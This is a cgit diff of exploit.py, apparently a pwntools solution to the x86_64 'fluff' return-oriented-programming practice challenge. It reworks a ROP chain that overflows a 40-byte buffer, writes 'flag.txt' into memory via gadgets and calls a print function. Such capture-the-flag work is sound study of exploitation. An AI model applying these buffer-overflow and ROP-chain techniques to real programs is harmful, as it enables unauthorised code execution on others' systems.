summaryrefslogtreecommitdiff
path: root/x86_64/fluff/exploit.py
diff options
context:
space:
mode:
Diffstat (limited to 'x86_64/fluff/exploit.py')
-rwxr-xr-xx86_64/fluff/exploit.py30
1 files changed, 14 insertions, 16 deletions
diff --git a/x86_64/fluff/exploit.py b/x86_64/fluff/exploit.py
index cdf5de8..2b520d8 100755
--- a/x86_64/fluff/exploit.py
+++ b/x86_64/fluff/exploit.py
@@ -13,37 +13,35 @@ letter_lookups = {
def write_str(dest, string, payload):
payload += p64(0x00000000004006a3)
payload += p64(dest)
- for c in string:
- payload += p64(0x40062a)
- payload += p64(0x4000) # if things go wrong, check endian/order
+ payload += p64(0x0000000000400610)
+ payload += p64(1)
+ payload += p64(0x40062a)
+ payload += p64(0x4000)
+ payload += p64(letter_lookups[string[0]] - 0x3ef2)
+ payload += p64(0x400628)
+ payload += p64(0x400639)
+
+
+ for c in string[1:]:
+ payload += p64(0x40062b)
payload += p64(letter_lookups[c] - 0x3ef2)
-
payload += p64(0x0000000000400610)
- payload += p64(0)
-
+ payload += p64(1)
payload += p64(0x400628)
-
payload += p64(0x400639)
return(payload)
-prog = gdb.debug('./fluff', gdbscript='''
-break *pwnme + 151
-'''
-)
+prog = process('./fluff')
payload = b''
for c in range(40):
payload += b'a'
payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
payload += p64(0x00000000004006a3)
-payload += p64(0x601be0) # set rdi
-
+payload += p64(0x601be0)
payload += p64(0x0000000000400510)
-payload += b"\n"
prog.sendline(payload)
-sleep(1)
-print(str(prog.recv(), 'UTF-8'))
prog.interactive()
generated by cgit v1.2.3 (git 2.39.1) at 2024-09-21 09:44:36 +0000